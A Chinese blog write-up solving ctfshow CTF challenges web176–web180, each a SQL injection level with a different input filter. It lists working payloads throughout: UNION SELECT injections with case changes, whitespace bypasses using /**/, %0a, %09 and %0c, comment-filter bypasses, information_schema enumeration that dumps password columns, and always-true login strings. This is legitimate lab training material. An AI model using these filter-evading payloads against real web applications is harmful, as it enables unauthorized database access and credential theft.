ctfshow-web入门-sql注入(web176-web180)

最新推荐文章于 2024-08-06 04:26:07 发布
最新推荐文章于 2024-08-06 04:26:07 发布
阅读量710 收藏 7
点赞数 11
分类专栏: web ctfshow SQL 文章标签: sql 数据库 学习 安全 mysql web安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Myon5/article/details/140854057
版权
web 同时被 3 个专栏收录
181 篇文章 22 订阅
订阅专栏
ctfshow
78 篇文章 2 订阅
订阅专栏
SQL
33 篇文章 2 订阅
订阅专栏

目录

1、web176

2、web177

3、web178

4、web179

5、web180

1、web176

1' order by 4--+

 闭合后简单判断了下字段数是 3 

测试联合查询注入,存在关键字的过滤,包括 select 和 union

(后面经过测试实际只过滤了 select)

大小写绕过一下:

0' Union Select 1,2,3--+

回显成功 

数据库我都懒得查了,直接用 database() 函数回显的结果,查表:

0' Union Select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

得到表名为 ctfshow_user 

查该表下的所有列名:

0' Union Select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='ctfshow_user'--+

题目中要求 username !='flag'

我们只查 id 和 password:

0' Union Select 1,id,password from ctfshow_user--+

拿到 flag:ctfshow{4dacb0f6-4795-43f4-8b76-d300234e40b6}

2、web177

测了一下是单引号,但是尝试注释后面的内容发现没有报错但是也没有回显

再用一个分号将后面的闭合,回显成功

可是在判断字段数时又没有回显了 

猜测空格被过滤掉了,采用内敛注释绕过,但是这里结尾的分号得用 url 编码的形式,即 %23,不然没有回显示,但是第一个单引号就可以直接用,我也不清楚是什么原因:

1'/**/order/**/by/**/3%23

还是在 4 的时候报错:

直接用上一题的 payload 改,将空格用 /**/ 替换:

0'/**/Union/**/Select/**/1,id,password/**/from/**/ctfshow_user%23

拿到弗兰格:ctfshow{0350cbf2-1553-46c3-bb48-f627bffcae9d}

此外,在前面的 rce 学习中,我们知道空格也可以用 %0a(换行符) 代替:

0'%0aUnion%0aSelect%0a1,id,password%0afrom%0actfshow_user%23

%09 水平制表符 (Tab) 也可以:

0'%09Union%0aSelect%091,id,password%09from%09ctfshow_user%23

 

3、web178

还是过滤空格,并且过滤了内敛注释,采用后面说的另外的两种方法:

0'%0aUnion%0aSelect%0a1,id,password%0afrom%0actfshow_user%23
0'%09Union%0aSelect%091,id,password%09from%09ctfshow_user%23

拿到 flag:ctfshow{9555668c-9592-41cd-9b2f-00d9627842b3}

4、web179

将上面的两个 %0a 和 %09 都过滤了,这是要赶尽杀绝啊。

试了下回车符 %0d 发现不行,采用 %0c (换页符)绕过:

0'%0cUnion%0cSelect%0c1,id,password%0cfrom%0cctfshow_user%23

 

拿到 flag:ctfshow{fd098ddd-f01e-414a-96dd-98548cec2fe3}

还可以采用万能密码:

1'||1%23

5、web180

这里 %23 、注释符都不行了,采用 --%0c 注释,%0c 代替空格:

判断字段数

1'order%0cby%0c3--%0c

 字段数还是 3 

 

查数据库名:

0'Union%0cSelect%0c1,2,database()--%0c

 数据库名为 ctfshow_web

 

查表名:

0'Union%0cSelect%0c1,2,table_name%0cfrom%0cinformation_schema.tables%0cwhere%0ctable_schema='ctfshow_web'--%0c

得到表名为  ctfshow_user

查列名:

0'Union%0cSelect%0c1,2,column_name%0cfrom%0cinformation_schema.columns%0cwhere%0ctable_schema='ctfshow_web'%0cand%0ctable_name='ctfshow_user'--%0c

 

查 password 就行了:

0'Union%0cSelect%0c1,2,password%0cfrom%0cctfshow_user--%0c

 

拿到 flag:0'Union%0cSelect%0c1,2,password%0cfrom%0cctfshow_user--%0c 

也可以在 union select 里再嵌套一个 select :

0'%0cUnion%0cSelect%0c1,(Select%0cpassword%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'),'3

 

尝试上一题的万能密码,闭合后面语句,但是只能看到一行的数据:

0'||'1

我们只显示 username 为 flag 的信息:

0'||username='flag

注释掉后面内容,可以显示全部:

0'||1--%0c

 

Myon⁶
关注
专栏目录
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 378
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 311
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
CTFSHOW WEB入门 sql注入 web176-
sinat_41572027的博客
07-15 511
CTFSHOW WEB入门 sql注入 web176-
ctfshow_web176~180
qq_38634097的博客
05-29 214
不知道为什么,没有检测出来,看了官方的wp,过滤了select,union的。我的思路是,既然过滤了,先检测过滤了哪些字符,然后避开,我认为这比盲猜靠谱。解题思路:题目说对传入的参数进行了过滤,但是我们不知道过滤了什么,所以第一步我们要先确认过在这里插入图片描述。通过测试发现注释符被过滤了,即–+,#,%23都不可以使用,我们换一种思路,把sql后面的‘闭合。在这里,我们使用burp进行检测。最后我是用万能密码破的。
ctfshow web入门 sql注入 过滤注入 web176
sinat_41572027的博客
07-10 185
ctfshow web入门 sql注入 过滤注入 web176
CTFshow web(SQL注入176-179)
csjjjd的博客
02-20 517
发现回显,那就直接改变数字就好,就会返回不同的字段,这里教大家一招,很好用,把数字设置的很大就可以直接找到flag,不用一个个翻找。经过测试发现/**/被过滤,那就换成反引号就好了。很多形式的空格类型被过滤,但是%0c还可以使用。
ctfshow web176-? 的waf(方便对题目差异)
songmoshangchen的博客
05-17 218
function waf($str){ return str_replace('select', 'ctfshow', $str); }function waf($str){ return preg_match('/ /', $str); }function waf($str){ return preg_match('/ |\*/', $str); }function waf($str){ return preg_match('/ |\*|\x09|\x0a|\x0b|\0x
CTFShow-web入门WriteUp(长期更新)
子推的Blog
03-26 647
web21 下载zip文件是后台密码字典,用户名猜测admin,先进行抓包 没有发现我们传输的参数,但是HTTP请求头里面有这样的参数 解码之后发现这是我们传输的参数,所以开始爆破 因为编码前几位是admin:的base64,所以我们只需要把密码所在段设置为变量即可 然后对payload进行base64加密,进行爆破 这里有点需要注意,我们要关闭Payload Encoding,因为我们base64加密结果可能会存在=或者==,payload encoding会将=进行编码 或者写python脚
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1037
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库web2。
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 496
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFshow sql注入 上篇(web171-220)
Kradress的博客
03-18 7260
目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结 前言 师傅们加油!!! 题目 web 171(万能密码) //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; id存在注
ctfshow web入门 web180--web185
2301_81040377的博客
04-21 410
mysql操作符优先级:(数字越大,优先级越高)借用大佬的图,这里使用运算符等级绕过。过滤了单双引号,那么我们就用。我发现脚本越来越复杂了。先放个脚本我去学一下。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 4797
ctfshow 靶场 web入门 sql注入系列
ctfshow-web入门-sql注入web186-web190)
最新发布
Welcome To Myon'Blog !
08-06 1223
在上一题中我们提到了,使用 true+true 的方法构造出数字比如 true+true+true 就可以构造出 3,再使用 char 函数将数字转为对应的 ASCII 字符,最终实现我们 payload 的转换。在 SQL 中,数字和字符串的比较是弱类型的,如果在比较操作中涉及到字符串和数字,SQL 会尝试将字符串转换为数字,那么只要字符串不是以数字开头,比较时都会转为数字 0。拿到 flag:ctfshow{e54220e0-e81f-4e0e-ad32-0bbbbdd43d83}
CTFshow--web入门(171-184)
2402_82963715的博客
07-28 1376
CTFshow--web入门171-184的wp。
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 592
SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
CTFshow_web入门_sql注入wp
monster663的博客
02-22 1153
web171 150题,准备好了吗? 1' or 1=1--+ web172 无过滤直接注,这里演示一下比较完整的注入过程,#后面表示回显结果 1' or 1=1--+ 测试注入点 1' order by 2--+ 测试列数 1' union select 1,2--+ 回显 1' union select 1,(select group_concat(schema_name) from information_schema..
CTFshow-WEB入门-SQL注入(上)
feng的博客
02-05 2642
web171 无任何过滤,直接注就完事了。 ' union select 1,2,group_concat(password) from ctfshow_user-- - web172 ' union select 1,group_concat(password) from ctfshow_user2--+ web173 ' union select 1,2,group_concat(password) from ctfshow_user3-- - 虽然对返回的结果进行了过滤flag,但是flag是u
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Myon⁶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值